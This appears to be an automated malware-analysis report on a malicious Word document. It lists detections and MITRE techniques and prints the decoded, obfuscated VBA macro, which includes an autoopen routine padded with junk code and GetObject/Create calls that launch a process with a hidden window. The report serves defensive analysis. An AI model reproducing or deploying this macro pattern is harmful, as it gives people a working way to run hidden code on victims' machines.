MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro utilizes a GetObject call, a common technique for executing arbitrary code or downloading payloads. The presence of legacy WordBasic auto-exec markers and the ClamAV detection further indicate malicious intent. The VBA script is heavily obfuscated, making it difficult to determine the exact payload or destination, hence the 'unknown family' classification.
Heuristics 7
-
ClamAV: Doc.Malware.Dsdu-6905405-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dsdu-6905405-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12497 bytes |
SHA-256: 769f1f010a6c9c664422459f2ed0d85c3bf85f735eb649126c536b48059a9847 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "V_AQxA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "QXBAAA"
Attribute VB_Base = "0{232B3040-6D07-46B7-8AEA-9D06B39D66BE}{2F1EA1D3-2399-4010-BF69-5157FE5CC004}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "oC4B4A"
Sub autoopen()
On Error Resume Next
If LQkACU = FBAAA_AQ Then
w4XkGAC = (207318623)
FU_A4A = (A14QUGAQ * CInt(407771253 _
+ Atn(222480772 * oAQDQAA)) + RUABxAAD + CDbl(L1kAAc - Sqr(bDkUAk / _
CBool(955581245 / 287618393) + SwDkDA - Rnd(sCUCAAA))) * 115001129 * 886426616)
U1DDxUxA = (939469626)
End If
If VBxQQc = h4BABw Then
qU14Ao = (281614625)
HXoZBcA = (txxwDk * CInt(148996833 _
+ Atn(435203762 * ABAwAD)) + hZAQBA + CDbl(pAAAAA1 - Sqr(YABAA_A / _
CBool(944893507 / 60178560) + FcBACoAA - Rnd(XAAUADQ))) * 146479080 * 568305737)
Ro4X1x = (489054753)
End If
If SAwDwU = TUkwAcC Then
UDAUwA = (545227970)
LAUAoZ = (PABBCCU * CInt(676242049 _
+ Atn(2004818 * GxAxcD)) + wokcGBx + CDbl(uAZ4CBU - Sqr(cAAAUw / _
CBool(25682111 / 541253005) + d1UAAA - Rnd(JAAAAAC))) * 783889166 * 759727341)
IACoGQc = (321608616)
End If
Set zo4BBcGA = GetObject(Z__ZACZ + QXBAAA.i4xkAXUA + tAAcxoGA)
If sXDADkk = kQ_AU__ Then
d_AGCA = (288765909)
UB1QUQ_ = (uADAZGG * CInt(6970405 _
+ Atn(137712537 * nDDDAwC4)) + BoDAA1 + CDbl(ICCXc4 - Sqr(QCAxCAAQ / _
CBool(735086908 / 300383593) + aX4oDwoA - Rnd(oU_Bc1A))) * 564481517 * 130008187)
LocAA1DA = (549184604)
End If
If pZGwAowG = JxXAcC Then
YAGQkAo = (114579851)
bAABAXD1 = (Xo_AoXUw * CInt(829280736 _
+ Atn(859915205 * V4AZAx)) + R1ABAUB4 + CDbl(MUAUk4 - Sqr(vAXG1BA / _
CBool(414967801 / 842908985) + qADAQ4AU - Rnd(ZADQAAQ_))) * 720686101 * 492679830)
Vk_BGx = (317047363)
End If
If NAwDUAAA = TQxBX1oC Then
XQwDBk = (823700352)
kABAcDQ = (OwDDBAQA * CInt(153520158 _
+ Atn(939920494 * QXwQ1Z)) + p4Aokk + CDbl(sAQUAAG4 - Sqr(JAQACow / _
CBool(214387552 / 382535454) + HGBwAx - Rnd(Kc__AA))) * 102946009 * 167549854)
NZABA1 = (119247067)
End If
zo4BBcGA.ShowWindow = 298336 - 298336
If o1QG4cQ = uD1AAcX Then
WBwkAXUo = (399550076)
LUCUA1 = (UA4_Ak * CInt(81554373 _
+ Atn(842863109 * fDAwAU)) + hBACUB + CDbl(UXkoAA - Sqr(vABD1x / _
CBool(653588024 / 352182117) + ocwxAAAx - Rnd(iA_xxAU))) * 881236961 * 720215043)
zAA1Bo = (152773677)
End If
If PDcBBAA = ockBZQBB Then
BQQxAAAC = (723241726)
iUAAGXAU = (rDAUc4D1 * CInt(727216091 _
+ Atn(526127557 * RkBQDA)) + lXXAk1 + CDbl(rB1ok1X - Sqr(PAAAAcQ / _
CBool(444628792 / 429440776) + nABDQG - Rnd(IX4UABA))) * 144383498 * 239351901)
BAAAAA = (608721218)
End If
GetObject(W1GCBQ + QXBAAA.N_BDAoG + JDAAQAAU). _
Create@ DXBQA1A + QXBAAA.dxxQBQZA + nAAAAA_ + QXBAAA.RAAwQQ + vAADQUAQ + QXBAAA.zADUcAQA + UAADwkAo, ZD41XACA, zo4BBcGA, WDQBQU
If EAADBZA = GACU1Ak Then
aAwDA4_A = (496748349)
wCUAAAxc = (JcAQAcA * CInt(242897286 _
+ Atn(402902910 * wABwwx)) + uQxAAQX + CDbl(wckkoUAA - Sqr(ZAADDCA / _
CBool(950826652 / 896583089) + K1QDAoXA - Rnd(NAC1AXAD))) * 657129219 * 241113497)
YxcA_AwB = (584162951)
End If
If zBGkU4 = uUXBBwAA Then
iAACAA = (260027090)
kc14BAo = (iAQQAA4 * CInt(167038775 _
+ Atn(674351520 * mAA_xUG)) + FAoBA4 + CDbl(FA1cABB - Sqr(pAcDBAB / _
CBool(294797125 / 604420666) + rBB4Ao_A - Rnd(bBUxAxUB))) * 411144586 * 392351117)
TAUDGQ = (867134419)
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/8fb5ae5fedc04c0e888d92c41ffbf226.bin
' ===============================================================================
' Module streams:
' Macros/VBA/V_AQxA - 1104 bytes
' Macros/VBA/QXBAAA - 1157 bytes
' Macros/VBA/oC4B4A - 579
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.